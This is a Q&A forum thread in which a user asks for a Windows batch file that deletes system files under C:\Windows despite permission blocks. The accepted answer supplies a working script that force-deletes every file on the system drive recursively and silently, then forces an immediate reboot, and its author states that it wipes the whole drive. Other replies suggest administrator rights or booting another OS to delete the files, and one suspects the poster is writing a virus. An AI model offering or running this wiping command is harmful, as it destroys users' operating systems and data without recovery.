# Permissions delete windows files Batch

Tags: windows, permissions, batch-file

I would like a batch file which can delete C:\Windows files. But every time i try (:D) it keeps me away from it because of the permissions.

Does anyone know how to remove C:\WINDOWS files?

Thanks.

Answer (score 0, accepted):

Got it now:

```
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
```

i know this deletes the hole drive,,, but you can use this on any way.

Was it so hard for you guys?

xD

Answer (score 2):

I have my doubts about this like the rest, but to address the issue you most likely need to be an Administrator on the the box.

Answer (score 1):

Well, you can't if you are running the windows from the same directory. Windows will never allow you to do that.

Try booting up your system with some other OS and then you can remove the directory of another OS.

BTW, why are you doing this? Are you trying to write some kind of a dumb virus?

Comment: i'm such a noob in Visual Basic, so how to hack should i do DEL commands with Cosmos? (Free open-source operating system template)

Answer (score 0):

are you trying to run this while Windows is running.  That will not work on many files in C:\windows simply b/c the operating system is using them.

Answer (score 0):

Get a CD and boot the box using a Linux disk.  Mount the drive and delete until your eyes bleed.

Comment: A little bit too complicated for him don't you think. :)

Comment: which part... putting in the cd or deleting the files?

Comment: Yeah but that's the easy thing. i also can run the Windows Installation Disc and then run the commandprompt.